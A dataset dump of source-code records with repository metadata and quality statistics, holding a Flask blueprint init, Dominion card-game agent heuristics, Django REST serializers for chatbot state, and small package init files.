hexsha  string
size  int64
ext  string
lang  string
max_stars_repo_path  string
max_stars_repo_name  string
max_stars_repo_head_hexsha  string
max_stars_repo_licenses  list
max_stars_count  int64
max_stars_repo_stars_event_min_datetime  string
max_stars_repo_stars_event_max_datetime  string
max_issues_repo_path  string
max_issues_repo_name  string
max_issues_repo_head_hexsha  string
max_issues_repo_licenses  list
max_issues_count  int64
max_issues_repo_issues_event_min_datetime  string
max_issues_repo_issues_event_max_datetime  string
max_forks_repo_path  string
max_forks_repo_name  string
max_forks_repo_head_hexsha  string
max_forks_repo_licenses  list
max_forks_count  int64
max_forks_repo_forks_event_min_datetime  string
max_forks_repo_forks_event_max_datetime  string
content  string
avg_line_length  float64
max_line_length  int64
alphanum_fraction  float64
qsc_code_num_words_quality_signal  int64
qsc_code_num_chars_quality_signal  float64
qsc_code_mean_word_length_quality_signal  float64
qsc_code_frac_words_unique_quality_signal  float64
qsc_code_frac_chars_top_2grams_quality_signal  float64
qsc_code_frac_chars_top_3grams_quality_signal  float64
qsc_code_frac_chars_top_4grams_quality_signal  float64
qsc_code_frac_chars_dupe_5grams_quality_signal  float64
qsc_code_frac_chars_dupe_6grams_quality_signal  float64
qsc_code_frac_chars_dupe_7grams_quality_signal  float64
qsc_code_frac_chars_dupe_8grams_quality_signal  float64
qsc_code_frac_chars_dupe_9grams_quality_signal  float64
qsc_code_frac_chars_dupe_10grams_quality_signal  float64
qsc_code_frac_chars_replacement_symbols_quality_signal  float64
qsc_code_frac_chars_digital_quality_signal  float64
qsc_code_frac_chars_whitespace_quality_signal  float64
qsc_code_size_file_byte_quality_signal  float64
qsc_code_num_lines_quality_signal  float64
qsc_code_num_chars_line_max_quality_signal  float64
qsc_code_num_chars_line_mean_quality_signal  float64
qsc_code_frac_chars_alphabet_quality_signal  float64
qsc_code_frac_chars_comments_quality_signal  float64
qsc_code_cate_xml_start_quality_signal  float64
qsc_code_frac_lines_dupe_lines_quality_signal  float64
qsc_code_cate_autogen_quality_signal  float64
qsc_code_frac_lines_long_string_quality_signal  float64
qsc_code_frac_chars_string_length_quality_signal  float64
qsc_code_frac_chars_long_word_length_quality_signal  float64
qsc_code_frac_lines_string_concat_quality_signal  float64
qsc_code_cate_encoded_data_quality_signal  float64
qsc_code_frac_chars_hex_words_quality_signal  float64
qsc_code_frac_lines_prompt_comments_quality_signal  float64
qsc_code_frac_lines_assert_quality_signal  float64
qsc_codepython_cate_ast_quality_signal  float64
qsc_codepython_frac_lines_func_ratio_quality_signal  float64
qsc_codepython_cate_var_zero_quality_signal  bool
qsc_codepython_frac_lines_pass_quality_signal  float64
qsc_codepython_frac_lines_import_quality_signal  float64
qsc_codepython_frac_lines_simplefunc_quality_signal  float64
qsc_codepython_score_lines_no_logic_quality_signal  float64
qsc_codepython_frac_lines_print_quality_signal  float64
qsc_code_num_words  int64
qsc_code_num_chars  int64
qsc_code_mean_word_length  int64
qsc_code_frac_words_unique  null
qsc_code_frac_chars_top_2grams  int64
qsc_code_frac_chars_top_3grams  int64
qsc_code_frac_chars_top_4grams  int64
qsc_code_frac_chars_dupe_5grams  int64
qsc_code_frac_chars_dupe_6grams  int64
qsc_code_frac_chars_dupe_7grams  int64
qsc_code_frac_chars_dupe_8grams  int64
qsc_code_frac_chars_dupe_9grams  int64
qsc_code_frac_chars_dupe_10grams  int64
qsc_code_frac_chars_replacement_symbols  int64
qsc_code_frac_chars_digital  int64
qsc_code_frac_chars_whitespace  int64
qsc_code_size_file_byte  int64
qsc_code_num_lines  int64
qsc_code_num_chars_line_max  int64
qsc_code_num_chars_line_mean  int64
qsc_code_frac_chars_alphabet  int64
qsc_code_frac_chars_comments  int64
qsc_code_cate_xml_start  int64
qsc_code_frac_lines_dupe_lines  int64
qsc_code_cate_autogen  int64
qsc_code_frac_lines_long_string  int64
qsc_code_frac_chars_string_length  int64
qsc_code_frac_chars_long_word_length  int64
qsc_code_frac_lines_string_concat  null
qsc_code_cate_encoded_data  int64
qsc_code_frac_chars_hex_words  int64
qsc_code_frac_lines_prompt_comments  int64
qsc_code_frac_lines_assert  int64
qsc_codepython_cate_ast  int64
qsc_codepython_frac_lines_func_ratio  int64
qsc_codepython_cate_var_zero  int64
qsc_codepython_frac_lines_pass  int64
qsc_codepython_frac_lines_import  int64
qsc_codepython_frac_lines_simplefunc  int64
qsc_codepython_score_lines_no_logic  int64
qsc_codepython_frac_lines_print  int64
effective  string
hits  int64
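The listing above pairs each column with its dtype; everything that follows is sample records, one value per field in schema order. As a minimal sketch of how a table with this schema could be loaded and filtered on its quality signals (assuming the records are stored as Parquet; the file name data.parquet is hypothetical):

import pandas as pd

# Load the table; column names and dtypes follow the schema above.
df = pd.read_parquet("data.parquet")

# Keep Python files that look hand-written: few duplicated lines,
# mostly alphabetic characters, and not flagged as auto-generated.
mask = (
    (df["lang"] == "Python")
    & (df["qsc_code_frac_lines_dupe_lines_quality_signal"] < 0.2)
    & (df["qsc_code_frac_chars_alphabet_quality_signal"] > 0.5)
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
)
print(df.loc[mask, ["max_stars_repo_name", "size", "hits"]].head())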
d439ffdbf06785b49342634199820579ecf19f5f
102
py
Python
app/routes/__init__.py
abcnever/euchre-game
5446e345e0dfdcf83d5fe87c3d2cedc31b3ae669
[ "MIT" ]
1
2018-12-31T05:38:56.000Z
2018-12-31T05:38:56.000Z
app/routes/__init__.py
abcnever/euchre-game
5446e345e0dfdcf83d5fe87c3d2cedc31b3ae669
[ "MIT" ]
4
2018-11-03T15:51:13.000Z
2019-01-12T21:09:23.000Z
app/routes/__init__.py
abcnever/euchre-game
5446e345e0dfdcf83d5fe87c3d2cedc31b3ae669
[ "MIT" ]
null
null
null
from flask import Blueprint

routes = Blueprint('routes', __name__)

from . import index
import rooms
14.571429
38
0.77451
13
102
5.769231
0.615385
0.4
0
0
0
0
0
0
0
0
0
0
0.156863
102
6
39
17
0.872093
0
0
0
0
0
0.058824
0
0
0
0
0
0
1
0
false
0
0.75
0
0.75
0.5
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
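The derived statistics stored with each record can be checked against its content field. A minimal sketch for the record above; the reconstruction of the file (blank lines, trailing newline) and the counting conventions (newline-split segments including the empty trailing one, \w as the alphanumeric class) are assumptions inferred from the stored values:

import re

content = (
    "from flask import Blueprint\n"
    "\n"
    "routes = Blueprint('routes', __name__)\n"
    "\n"
    "from . import index\n"
    "import rooms\n"
)

size = len(content)                            # 102, the stored size
segments = content.split("\n")                 # 7 segments; the trailing newline adds an empty one
print(size / len(segments))                    # 14.571429, the stored avg_line_length
print(max(len(s) for s in segments))           # 38, the stored max_line_length
print(len(re.findall(r"\w", content)) / size)  # 0.77451, the stored alphanum_fraction

Under these assumptions all three stored values are reproduced exactly (102/7, 38, and 79/102).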
2e03f35b0822759a335c0fe0661869bd17581090
19,035
py
Python
domrl/agents/my_agents.py
santiagonasar/DomRL
00ce010ea2d5d3cb1b56910f2304c114d82d3198
[ "MIT" ]
null
null
null
domrl/agents/my_agents.py
santiagonasar/DomRL
00ce010ea2d5d3cb1b56910f2304c114d82d3198
[ "MIT" ]
null
null
null
domrl/agents/my_agents.py
santiagonasar/DomRL
00ce010ea2d5d3cb1b56910f2304c114d82d3198
[ "MIT" ]
null
null
null
import string
import numpy
import copy

from domrl.engine.agent import Agent

"""
class Agent(object):
    def choose(self, decision, state):
        return decision.moves[0]


class StdinAgent(Agent):
    def choose(self, decision, state):
        # Autoplay
        if len(decision.moves) == 1:
            return [0]

        player = decision.player
        print(f" ==== Decision to be made by {player} ==== ")
        print(f"Actions: {player.actions} | Buys: {player.buys} | Coins: {player.coins}")
        print("Hand: ", list(map(str, player.hand)))
        print(decision.prompt)
        for idx, move in enumerate(decision.moves):
            print(f"{idx}: {move}")

        # Get user input and process it.
        while True:
            user_input = input()
            if user_input == "?":
                state.event_log.print(player)
                print(state)
            else:
                try:
                    ans = list(map(lambda x: int(x.strip()), user_input.split(',')))
                except:
                    print('Clearly invalid input. Please try again.')
                    continue
                break
        return ans


class APIAgent(Agent):
    def choose(self, decision, state):
        # Autoplay
        # if len(decision.moves) == 1:
        #     return [0]
        player = decision.player
        actions = player.actions
        buys = player.buys
        coins = player.coins
        moves = decision.moves
        hand = player.hand
        state
        while True:
            user_input = input()
            if user_input == "?":
                state.event_log.print(player)
                print(state)
            else:
                ans = list(map(lambda x: int(x.strip()), user_input.split(',')))
                break
        return ans
"""


class RandomAgent(Agent):
    def policy(self, decision, state):
        if 'Trash up to 4' in decision.prompt:  # for chapel
            my_list = []
            range_max = numpy.random.randint(0, min(len(decision.moves), 4) + 1, 1, int)
            for idx in range(0, range_max[0]):
                new_item = -1
                while new_item == -1 or new_item in my_list:
                    new_item = numpy.random.randint(0, len(decision.moves), 1, int)[0]
                my_list.append(new_item)
            return my_list
        if len(decision.moves) == 0:
            return []
        if 'Discard down to 3 cards' in decision.prompt:  # for militia
            my_list = []
            range_max = max(len(decision.player.hand) - 3, 0)
            for idx in range(0, range_max):
                new_item = -1
                while new_item == -1 or new_item in my_list:
                    new_item = numpy.random.randint(0, len(decision.moves), 1, int)[0]
                my_list.append(new_item)
            return my_list
        value = list(numpy.random.randint(0, len(decision.moves), 1, int))
        return value


class PassOnBuySemiAgent(Agent):
    def policy(self, decision, state):
        if 'Buy' in decision.prompt:
            return [0]


class CleverAgentOld(Agent):
    def __init__(self, agent):
        self.agent = agent

    def policy(self, decision, state):
        initialDecision = copy.deepcopy(decision)
        # Automove If One Move
        if len(decision.moves) == 1:
            return [0]
        for idx in range(0, len(initialDecision.moves)):
            move = initialDecision.moves[idx]
            if "Buy: Curse" in move.__str__():
                decision.moves.pop(idx)
            if hasattr(move, "card") and (
                    move.card.add_actions > 0 or ("treasure" in decision.prompt.lower() and move.card.coins > 0)):
                return self.restrictDecision(decision.moves, initialDecision.moves, idx)
        restrictedChoice = self.agent.policy(decision, state)
        return self.restrictDecision(decision.moves, initialDecision.moves, restrictedChoice[0])

    def restrictDecision(self, moves, initialMoves, chosen):
        for idx in range(0, len(initialMoves)):
            if str(initialMoves[idx]) == str(moves[chosen]):
                return list([idx])
        return [chosen]


class RulesSemiAgent(Agent):
    def policy(self, decision, state):
        # Automove If One Move
        if len(decision.moves) == 1:
            return [0]
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break
            if "Bandit" in str(move):  # currently does not work
                decision.moves.pop(idx)
            if "Remodel" in str(move):  # currently does not work
                decision.moves.pop(idx)


class CleverSemiAgent(Agent):
    def policy(self, decision, state):
        # Automove If One Move
        if len(decision.moves) == 1:
            return [0]
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break
            if "Buy: Curse" in move.__str__():
                decision.moves.pop(idx)
            if hasattr(move, "card") and (
                    move.card.add_actions > 0 or ("treasure" in decision.prompt.lower() and move.card.coins > 0)):
                return [idx]


class ApplySemiAgent(Agent):
    def __init__(self, semiAgents, agent):
        self.semiAgents = semiAgents
        self.agent = agent

    def policy(self, decision, state):
        for semiAgent in self.semiAgents:
            value = semiAgent.policy(decision, state)
            if value is not None:
                return value
        return self.agent.policy(decision, state)


class BigMoneySemiAgent(Agent):
    def policy(self, decision, state):
        for stringDesired in ["Buy: Province", "Buy: Gold", "Buy: Silver"]:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if stringDesired in move.__str__():
                    return [idx]


class SmithySemiAgent(Agent):
    def policy(self, decision, state):
        for stringDesired in ["Play: Smithy"]:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if stringDesired in move.__str__():
                    return [idx]
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break
            if "Buy: Smithy" in move.__str__() and (
                    sum(1 for c in decision.player.all_cards if 'Smithy' in str(c)) / len(
                    decision.player.all_cards) < 0.1):
                return [idx]


class DontBuyCopperOrEstateSemiAgent(Agent):
    def policy(self, decision, state):
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break
            if 'Buy: Copper' in str(move) or 'Buy: Estate' in str(move):
                decision.moves.pop(idx)


class MyHeuristicSemiAgent(Agent):
    def policy(self, decision, state):
        for stringDesired in []:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if stringDesired in move.__str__():
                    return [idx]
        if 'Action' in decision.prompt:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if 'Militia' in str(move) or 'Smithy' in str(move):
                    return [idx]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        desired_deck = {'Festival': 1, 'Market': 1, 'Militia': 1, 'Smithy': 0.1, 'Village': 0.2}
        if numpy.random.randint(0, 2, 1, int) == 1:
            desired_deck = {'Market': 1, 'Festival': 1, 'Smithy': 0.1, 'Militia': 1, 'Village': 0.2}
        for wish in desired_deck:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if wish in str(move) and (
                        sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
                        decision.player.all_cards) < desired_deck[wish]):
                    return [idx]


class MarketSemiAgent(Agent):
    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for stringDesired in ['Empty']:
                for idx in range(0, len(decision.moves)):
                    try:
                        move = decision.moves[idx]
                    except:
                        break
                    if 'Militia' in str(move):
                        return [idx]
                    if 'Smithy' in str(move) and decision.player.actions > 1:
                        return [idx]
                    if stringDesired in str(move):
                        return [idx]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        desired_deck = {'Market': 1, 'Militia': 0.001, 'Smithy': 0.001, 'Village': 0.2}
        for wish in desired_deck:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if wish in str(move):
                    if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
                            decision.player.all_cards) < desired_deck[wish]:
                        return [idx]


class CustomHeuristicsSemiAgent(Agent):
    def __init__(self, desired_decks):
        self.desired_deck = desired_decks

    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for stringDesired in ['Empty']:
                for idx in range(0, len(decision.moves)):
                    try:
                        move = decision.moves[idx]
                    except:
                        break
                    if 'Militia' in str(move):
                        return [idx]
                    if 'Smithy' in str(move) and decision.player.actions > 1:
                        return [idx]
                    if stringDesired in str(move):
                        return [idx]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        for wish in self.desired_deck:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if wish in str(move):
                    if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
                            decision.player.all_cards) < self.desired_deck[wish]:
                        return [idx]


class MarketNoSmithySemiAgent(Agent):
    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for stringDesired in ['Empty']:
                for idx in range(0, len(decision.moves)):
                    try:
                        move = decision.moves[idx]
                    except:
                        break
                    if 'Militia' in str(move):
                        return [idx]
                    if 'Smithy' in str(move) and decision.player.actions > 1:
                        return [idx]
                    if stringDesired in str(move):
                        return [idx]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        desired_deck = {'Market': 1, 'Militia': 0.1, 'Village': 0.2}
        for wish in desired_deck:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if wish in str(move):
                    if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
                            decision.player.all_cards) < desired_deck[wish]:
                        return [idx]


class MarketNoSmithySemiAgent2(Agent):
    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for stringDesired in ['Empty']:
                for idx in range(0, len(decision.moves)):
                    try:
                        move = decision.moves[idx]
                    except:
                        break
                    if 'Militia' in str(move):
                        return [idx]
                    if 'Smithy' in str(move) and decision.player.actions > 1:
                        return [idx]
                    if stringDesired in str(move):
                        return [idx]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        desired_deck = {'Market': 1, 'Militia': 0.2, 'Village': 0.2}
        for wish in desired_deck:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if wish in str(move):
                    if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
                            decision.player.all_cards) < desired_deck[wish]:
                        return [idx]


class OnlyBuyCopperIfSemiAgent(Agent):
    def policy(self, decision, state):
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break
            if "Buy: Copper" in str(move):
                if sum(c.coins for c in decision.player.all_cards) < 5:
                    return [idx]
                else:
                    decision.moves.pop(idx)


class ChapelSemiAgent(Agent):
    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for c in decision.player.hand:
                if 'Estate' in str(c):
                    for idx in range(0, len(decision.moves)):
                        if 'Play: Chapel' in str(decision.moves[idx]):
                            return [idx]
        if 'Trash up to 4' in decision.prompt:
            moves = []
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                if "Choose: Estate" in move.__str__():
                    moves.append(idx)
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                if "Choose: Copper" in move.__str__() and (
                        sum(c.coins for c in decision.player.all_cards) -
                        sum(1 for planned_move in moves if 'Copper' in str(planned_move)) > 5):
                    moves.append(idx)
            return moves
        if 'Buy' in decision.prompt:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if 'Buy: Chapel' in str(move) and decision.player.coins < 4 and (
                        sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0):
                    return [idx]


class AggressiveChapelSemiAgent(ChapelSemiAgent):
    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for c in decision.player.hand:
                if 'Estate' in str(c) or ('Copper' in str(c) and sum(c.coins for c in decision.player.all_cards) > 5):
                    for idx in range(0, len(decision.moves)):
                        if 'Play: Chapel' in str(decision.moves[idx]):
                            return [idx]
        if 'Trash' in decision.prompt:
            moves = []
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                if "Choose: Estate" in str(move):
                    moves.append(idx)
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                if "Choose: Copper" in str(move) and (
                        sum(c.coins for c in decision.player.all_cards) -
                        sum(1 for planned_move in moves if 'Copper' in str(decision.moves[planned_move])) > 5):
                    moves.append(idx)
            return moves
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break
            if "Buy: Chapel" in str(move) and (sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) > 0):
                decision.moves.pop(idx)
            if "Buy: Chapel" in str(move) and decision.player.coins < 4 and (
                    sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0):
                return [idx]


class ProvinceSemiAgent(Agent):
    def policy(self, decision, state):
        for stringDesired in ["Buy: Province"]:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if stringDesired in move.__str__():
                    return [idx]


class ProvinceNeverLoseSemiAgent(Agent):
    def policy(self, decision, state):
        desired_strings = ["Buy: Province"]
        if (state.supply_piles['Province'].qty == 1 and
                (6 + decision.player.total_vp() < max(state.other_players, key=lambda pr: pr.total_vp()).total_vp())):
            desired_strings = ["Buy: Duchy"]
        for stringDesired in desired_strings:
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if stringDesired in str(move):
                    return [idx]
32.262712
118
0.492094
2,095
19,035
4.409547
0.083532
0.111171
0.065815
0.045031
0.790431
0.767049
0.75774
0.731868
0.708811
0.682615
0
0.012843
0.41098
19,035
589
119
32.317487
0.811095
0.006987
0
0.760204
0
0
0.049746
0
0
0
0
0
0
1
0.058673
false
0.002551
0.010204
0
0.247449
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2e0969f7a34ab55314e5540bfd52964a79256105
7,452
py
Python
permabots/serializers/state.py
eafanasev/permabots
24de0376e8c482800f4214c021c133d81b9de69f
[ "BSD-3-Clause" ]
81
2016-05-18T02:34:10.000Z
2021-08-28T17:25:13.000Z
permabots/serializers/state.py
eafanasev/permabots
24de0376e8c482800f4214c021c133d81b9de69f
[ "BSD-3-Clause" ]
15
2016-05-27T08:51:46.000Z
2021-03-19T21:42:21.000Z
permabots/serializers/state.py
eafanasev/permabots
24de0376e8c482800f4214c021c133d81b9de69f
[ "BSD-3-Clause" ]
34
2016-05-29T14:37:01.000Z
2022-03-24T17:16:53.000Z
from rest_framework import serializers
from permabots.models import State, TelegramChatState, TelegramChat, TelegramUser, KikChatState, KikChat, KikUser, MessengerChatState
from django.utils.translation import ugettext_lazy as _


class StateSerializer(serializers.HyperlinkedModelSerializer):
    id = serializers.ReadOnlyField(help_text=_("State ID"))

    class Meta:
        model = State
        fields = ['id', 'created_at', 'updated_at', 'name']
        read_only_fields = ('id', 'created_at', 'updated_at',)


class TelegramChatStateSerializer(serializers.ModelSerializer):
    id = serializers.ReadOnlyField(help_text=_("Chat State ID"))
    chat = serializers.IntegerField(source="chat.id", help_text=_("Chat identifier. Telegram API format. https://core.telegram.org/bots/api#chat"))
    state = StateSerializer(many=False, help_text=_("State associated to the Chat"))
    user = serializers.IntegerField(source="user.id", help_text=_("User indentifier. Telegram API format. https://core.telegram.org/bots/api#chat"))

    class Meta:
        model = TelegramChatState
        fields = ['id', 'created_at', 'updated_at', 'chat', 'user', 'state']
        read_only_fields = ('id', 'created_at', 'updated_at',)

    def create(self, validated_data):
        chat = TelegramChat.objects.get(pk=validated_data['chat'])
        user = TelegramUser.objects.get(pk=validated_data['user'])
        state = State.objects.get(name=validated_data['state']['name'])
        chat_state = TelegramChatState.objects.create(chat=chat, state=state, user=user)
        return chat_state

    def update(self, instance, validated_data):
        chat = TelegramChat.objects.get(pk=validated_data['chat']['id'])
        user = TelegramUser.objects.get(pk=validated_data['user']['id'])
        state = State.objects.get(name=validated_data['state']['name'])
        instance.chat = chat
        instance.user = user
        instance.state = state
        instance.save()
        return instance


class TelegramChatStateUpdateSerializer(TelegramChatStateSerializer):
    chat = serializers.IntegerField(source="chat.id", required=False, help_text=_("Chat identifier. Telegram API format. https://core.telegram.org/bots/api#chat"))
    state = StateSerializer(many=False, required=False, help_text=_("State associated to the Chat"))
    user = serializers.IntegerField(source="user.id", required=False, help_text=_("User identifier. Telegram API format. https://core.telegram.org/bots/api#chat"))

    def update(self, instance, validated_data):
        if 'user' in validated_data:
            instance.user = TelegramUser.objects.get(pk=validated_data['user']['id'])
        if 'chat' in validated_data:
            instance.chat = TelegramChat.objects.get(pk=validated_data['chat']['id'])
        if 'state' in validated_data:
            instance.state = State.objects.get(name=validated_data['state']['name'])
        instance.save()
        return instance


class KikChatStateSerializer(serializers.ModelSerializer):
    id = serializers.ReadOnlyField(help_text=_("Chat State ID"))
    chat = serializers.CharField(source="chat.id", help_text=_("Chat identifier. Kik API format."))
    state = StateSerializer(many=False, help_text=_("State associated to the Chat"))
    user = serializers.CharField(source="user.username", help_text=_("User indentifier. Kik API format"))

    class Meta:
        model = KikChatState
        fields = ['id', 'created_at', 'updated_at', 'chat', 'user', 'state']
        read_only_fields = ('id', 'created_at', 'updated_at',)

    def create(self, validated_data):
        chat = KikChat.objects.get(pk=validated_data['chat'])
        user = KikUser.objects.get(pk=validated_data['user'])
        state = State.objects.get(name=validated_data['state']['name'])
        chat_state = KikChatState.objects.create(chat=chat, state=state, user=user)
        return chat_state

    def update(self, instance, validated_data):
        chat = KikChat.objects.get(pk=validated_data['chat']['id'])
        user = KikUser.objects.get(pk=validated_data['user']['username'])
        state = State.objects.get(name=validated_data['state']['name'])
        instance.chat = chat
        instance.user = user
        instance.state = state
        instance.save()
        return instance


class KikChatStateUpdateSerializer(KikChatStateSerializer):
    chat = serializers.CharField(source="chat.id", required=False, help_text=_("Chat identifier. Kik API format."))
    state = StateSerializer(many=False, required=False, help_text=_("State associated to the Chat"))
    user = serializers.CharField(source="user.username", required=False, help_text=_("User identifier. Kik API format."))

    def update(self, instance, validated_data):
        if 'user' in validated_data:
            instance.user = KikUser.objects.get(pk=validated_data['user']['username'])
        if 'chat' in validated_data:
            instance.chat = KikChat.objects.get(pk=validated_data['chat']['id'])
        if 'state' in validated_data:
            instance.state = State.objects.get(name=validated_data['state']['name'])
        instance.save()
        return instance


class MessengerChatStateSerializer(serializers.ModelSerializer):
    id = serializers.ReadOnlyField(help_text=_("Chat State ID"))
    chat = serializers.CharField(help_text=_("Chat identifier. Messenger API format."))
    state = StateSerializer(many=False, help_text=_("State associated to the Chat"))

    class Meta:
        model = MessengerChatState
        fields = ['id', 'created_at', 'updated_at', 'chat', 'state']
        read_only_fields = ('id', 'created_at', 'updated_at',)

    def create(self, validated_data):
        chat = validated_data['chat']
        state = State.objects.get(name=validated_data['state']['name'])
        chat_state = MessengerChatState.objects.create(chat=chat, state=state)
        return chat_state

    def update(self, instance, validated_data):
        chat = validated_data['chat']
        state = State.objects.get(name=validated_data['state']['name'])
        instance.chat = chat
        instance.state = state
        instance.save()
        return instance


class MessengerChatStateUpdateSerializer(MessengerChatStateSerializer):
    chat = serializers.CharField(required=False, help_text=_("Chat identifier. Messenger API format."))
    state = StateSerializer(many=False, required=False, help_text=_("State associated to the Chat"))

    def update(self, instance, validated_data):
        if 'chat' in validated_data:
            instance.chat = validated_data['chat']
        if 'state' in validated_data:
            instance.state = State.objects.get(name=validated_data['state']['name'])
        instance.save()
        return instance
47.164557
148
0.625872
780
7,452
5.833333
0.103846
0.117143
0.056044
0.055385
0.827912
0.82044
0.778022
0.746593
0.716264
0.658462
0
0
0.255502
7,452
158
149
47.164557
0.820115
0
0
0.601626
0
0
0.163022
0
0
0
0
0
0
1
0.073171
false
0
0.02439
0
0.422764
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2e1d52600cecea1b471b062e4a225acf8590bb5b
201
py
Python
robotathome/__init__.py
goyoambrosio/RobotAtHome_API
91864b4cf06202656def6b66ac348708337a9d52
[ "MIT" ]
1
2021-02-21T09:31:25.000Z
2021-02-21T09:31:25.000Z
robotathome/__init__.py
goyoambrosio/RobotAtHome_API
91864b4cf06202656def6b66ac348708337a9d52
[ "MIT" ]
null
null
null
robotathome/__init__.py
goyoambrosio/RobotAtHome_API
91864b4cf06202656def6b66ac348708337a9d52
[ "MIT" ]
null
null
null
#!/usr/bin/env python
# -*- coding: utf-8 -*-

__version__ = "0.4.9"
from robotathome.version import *
from robotathome.helpers import *
from robotathome.toolbox import *
from robotathome.log import *
22.333333
33
0.731343
27
201
5.296296
0.62963
0.41958
0.440559
0
0
0
0
0
0
0
0
0.022989
0.134328
201
8
34
25.125
0.798851
0.208955
0
0
0
0
0.031847
0
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
5cf06ac7a7b0b3cfe37cd14963dd9859601b68ba
716
py
Python
dojo/__init__.py
VIVelev/PyDojo
d932b3df841636208611192be1f881390c361289
[ "MIT" ]
4
2018-10-29T22:01:39.000Z
2019-01-15T14:46:40.000Z
dojo/__init__.py
VIVelev/PyDojo
d932b3df841636208611192be1f881390c361289
[ "MIT" ]
3
2018-12-16T15:35:52.000Z
2020-03-31T01:14:53.000Z
dojo/__init__.py
VIVelev/PyDojo
d932b3df841636208611192be1f881390c361289
[ "MIT" ]
null
null
null
from . import (
    anomaly,
    base,
    bayes,
    cluster,
    dimred,
    ensemble,
    evolution,
    linear,
    metrics,
    nlp,
    nn,
    plot,
    preprocessing,
    split,
    svm,
    tree,
    tuning,
    activations,
    exceptions,
    losses,
    misc,
    optimizers,
    regularizers,
    statistics,
)

__all__ = [
    "anomaly",
    "base",
    "bayes",
    "cluster",
    "dimred",
    "ensemble",
    "evolution",
    "linear",
    "metrics",
    "nlp",
    "nn",
    "plot",
    "preprocessing",
    "split",
    "svm",
    "tree",
    "tuning",
    "activations",
    "exceptions",
    "losses",
    "misc",
    "optimizers",
    "regularizers",
    "statistics",
]

__version__ = "0.4.9"
12.785714
21
0.49581
55
716
6.309091
0.563636
0.063401
0.092219
0.132565
0.933718
0.933718
0.933718
0.933718
0.933718
0.933718
0
0.006494
0.354749
716
55
22
13.018182
0.744589
0
0
0
0
0
0.23324
0
0
0
0
0
0
1
0
false
0
0.018868
0
0.018868
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
cf15d443632a0a7ff7b603303f52089b10666d75
29
py
Python
faculty_sync/__init__.py
Matt-Haugh/faculty-sync
56bac90badfe6812f44bad13f56715e4e16f4e57
[ "Apache-2.0" ]
6
2019-02-08T10:36:07.000Z
2021-11-30T06:04:56.000Z
faculty_sync/__init__.py
Matt-Haugh/faculty-sync
56bac90badfe6812f44bad13f56715e4e16f4e57
[ "Apache-2.0" ]
32
2018-04-29T13:54:39.000Z
